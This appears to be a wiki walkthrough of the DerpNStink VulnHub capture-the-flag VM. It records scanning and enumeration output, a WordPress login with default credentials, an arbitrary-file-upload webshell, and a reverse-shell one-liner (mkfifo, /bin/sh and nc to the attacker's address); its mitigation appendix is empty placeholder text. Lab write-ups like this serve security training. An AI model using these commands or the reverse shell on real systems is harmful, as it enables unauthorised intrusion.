DerpNStink: 1 ~ VulnHub - Walkthrough

Revision as of 06:32, 5 May 2018 by Dmina (talk | contribs) (Exploitation)

Objective

Remotely attack the VM and find all 4 flags eventually leading you to full root access.

Source: [VulnHub.com]

Status: [Work in progress]

Methodology

Discovery

root@kali:~# nmap -O -sT -sV -p- -T5 192.168.56.105
Starting Nmap 7.60 ( https://nmap.org ) at 2018-03-26 05:21 EDT
mass_dns: warning: Unable to determine any DNS servers. Reverse DNS is disabled. Try using --system-dns or specify valid servers with --dns-servers
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 66.67% done; ETC: 05:21 (0:00:03 remaining)
Nmap scan report for 192.168.56.105
Host is up (0.00068s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
MAC Address: 08:00:27:FF:CF:9E (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.8
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
...


Entry Point #1 - Port 80 (HTTP)

Enumeration

root@kali:~# nikto -h 192.168.56.105 -p 80
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.56.105
+ Target Hostname:    192.168.56.105
+ Target Port:        80
+ Start Time:         2018-03-26 05:22:22 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.7 (Ubuntu)
+ Server leaks inodes via ETags, header found with file /, fields: 0x512 0x55dcb6aaa2f50 
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Entry '/temporary/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 2 entries which should be manually viewed.
+ Apache/2.4.7 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: OPTIONS, GET, HEAD, POST 
+ Retrieved x-powered-by header: PHP/5.5.9-1ubuntu4.22
+ OSVDB-3233: /icons/README: Apache default file found.
+ 7537 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2018-03-26 05:22:34 (GMT-4) (12 seconds)
---------------------------------------------------------------------------
root@kali:~# curl http://192.168.56.101/robots.txt
User-agent: *
Disallow: /php/
Disallow: /temporary/

Let's take a look at the source of http://192.168.56.101/

Two things popped up

root@kali:/mnt/VM_Transfer/Pentesting/DerpNStink# curl -s http://192.168.56.101 |grep flag
<--flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166) -->

And

<script type="text/info" src="/webnotes/info.txt"></script>

/temporary/ tells me to "try harder!"

/php/ returns 403 Forbidden

Digging deeper with "dirb"

root@kali:/mnt/VM_Transfer/Pentesting/DerpNStink# dirb http://192.168.56.101 -w /usr/share/dirbuster/wordlists/directory-list-1.0.txt -R
...                                             
---- Scanning URL: http://192.168.56.101/ ----
==> DIRECTORY: http://192.168.56.101/css/                                                                                                                                                                         
+ http://192.168.56.101/index.html (CODE:200|SIZE:1298)                                                                                                                                                           
==> DIRECTORY: http://192.168.56.101/javascript/                                                                                                                                                                  
==> DIRECTORY: http://192.168.56.101/js/                                                                                                                                                                          
==> DIRECTORY: http://192.168.56.101/php/                                                                                                                                                                         
+ http://192.168.56.101/robots.txt (CODE:200|SIZE:53)                                                                                                                                                             
+ http://192.168.56.101/server-status (CODE:403|SIZE:294)                                                                                                                                                         
==> DIRECTORY: http://192.168.56.101/temporary/                                                                                                                                                                   
==> DIRECTORY: http://192.168.56.101/weblog/                                                                                                                                                                      
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.101/css/ ----
(?) Do you want to scan this directory (y/n)? n                                
Skipping directory.
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.101/javascript/ ----
(?) Do you want to scan this directory (y/n)? n                                
Skipping directory.
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.101/js/ ----
(?) Do you want to scan this directory (y/n)? n                                
Skipping directory.
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.101/php/ ----
(?) Do you want to scan this directory (y/n)? y                                                                                                                                                                    + http://192.168.56.101/php/info.php (CODE:200|SIZE:0)                                                                                                                                                            
==> DIRECTORY: http://192.168.56.101/php/phpmyadmin/                                                                                                                                                              
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.101/temporary/ ----
(?) Do you want to scan this directory (y/n)? y                                                                                                                                                                    + http://192.168.56.101/temporary/index.html (CODE:200|SIZE:12)                                                                                                                                                   
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.101/weblog/ ----
(?) Do you want to scan this directory (y/n)? y                                                                                                                                                                    + http://192.168.56.101/weblog/index.php (CODE:200|SIZE:14903)                                                                                                                                                    
==> DIRECTORY: http://192.168.56.101/weblog/wp-admin/                                                                                                                                                             
==> DIRECTORY: http://192.168.56.101/weblog/wp-content/                                                                                                                                                           
==> DIRECTORY: http://192.168.56.101/weblog/wp-includes/                                                                                                                                                          
+ http://192.168.56.101/weblog/xmlrpc.php (CODE:405|SIZE:42)                                                                                                                                                      
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.101/php/phpmyadmin/ ----
(?) Do you want to scan this directory (y/n)? n                                
Skipping directory.
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.101/weblog/wp-admin/ ----
(?) Do you want to scan this directory (y/n)? n                                
Skipping directory.
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.101/weblog/wp-content/ ----
(?) Do you want to scan this directory (y/n)? n                                
Skipping directory.
                                                                                                                                                                                                                  
---- Entering directory: http://192.168.56.101/weblog/wp-includes/ ----
(?) Do you want to scan this directory (y/n)? n                                
Skipping directory.
....

Let's check out that WordPress install

root@kali:/mnt/VM_Transfer/Pentesting/DerpNStink# curl -L http://192.168.56.101/weblog
curl: (6) Could not resolve host: derpnstink.local

Ok! Let's update /etc/hosts and try again.

Now WP site loads w/out issues. Before exploring further we try a few simple credential combinations and what do you know - admin:admin lets us in!

Not going to post any screenshots of WP internals as that's a pretty common sight these day.

Let's see what we can do now that we're in. Looks out that plugin upload is disabled but let's see what we can do with what we have installed already

root@kali:/mnt/VM_Transfer/Pentesting/DerpNStink# wpscan --enumerate vp --url http://192.168.56.101/weblog/ |grep "[!]"
[!] The WordPress 'http://derpnstink.local/weblog/readme.html' file exists exposing a version number
[!] 5 vulnerabilities identified from the version number
[!] Title: WordPress 3.7-4.9.1 - MediaElement Cross-Site Scripting (XSS)
[!] Title: WordPress <= 4.9.4 - Application Denial of Service (DoS) (unpatched)
[!] Title: WordPress 3.7-4.9.4 - Remove localhost Default
[!] Title: WordPress 3.7-4.9.4 - Use Safe Redirect for Login
[!] Title: WordPress 3.7-4.9.4 - Escape Version in Generator Tag
[!] The version is out of date, the latest version is 1.4
[!] The version is out of date, the latest version is 1.6.7.1
[!] Title: Slideshow Gallery < 1.4.7 Arbitrary File Upload
[!] Title: Tribulant Slideshow Gallery <= 1.5.3 - Arbitrary file upload & Cross-Site Scripting (XSS) 
[!] Title: Tribulant Slideshow Gallery <= 1.6.4 - Authenticated Cross-Site Scripting (XSS)
[!] Title: Slideshow Gallery <= 1.6.5 - Multiple Authenticated Cross-Site Scripting (XSS)

Exploitation

Looks like Slideshow Gallery allows for unchecked uploads. Trying WordPress Plugin - shell.php (variant 1).

Quick test... Works!!!

root@kali:~/Desktop/DerpNStink# curl http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/shell.php?cmd=hostname
DeRPnStiNK

Now let's do something more exciting - spinning a reverse shell!!!

First start a local listener.

kali@root $ nc -lt -p 4444

Then execute a remote command to connect to our listener. There are many different ways to do this, depending on what's allowed on the remote host. I'll do a nice write up on that soon but for now let's just use a simple 'sh' based, a method which proven to work for me 99% of the time.

kali@root $ curl -G "http://derpnstink.local/weblog/wp-content/uploads/slideshow-gallery/shell.php" --data-urlencode "cmd=rm -f /tmp/backpipe; mkfifo /tmp/backpipe; cat /tmp/backpipe | /bin/sh -i 2>&1|nc 192.168.56.203 4444 >/tmp/backpipe"

And we have a "$"!

kali@root $ nc -lt -p 4444

$ pwd
/var/www/html/weblog/wp-content/uploads/slideshow-gallery
$ hostname
DeRPnStiNK


Recommendations

Appendix A: Vulnerability Detail and Mitigation

xxxxxx
Rating High
Description xxxxxx
Impact xxxxxx
Remediation xxxxxx
xxxx
Rating High
Description xxxxxx
Impact xxxxxx
Remediation xxxxxx
xxxx
Rating High
Description xxxxxx
Impact xxxxxx
Remediation xxxxxx
xxxx
Rating High
Description xxxxxx
Impact xxxxxx
Remediation xxxxxx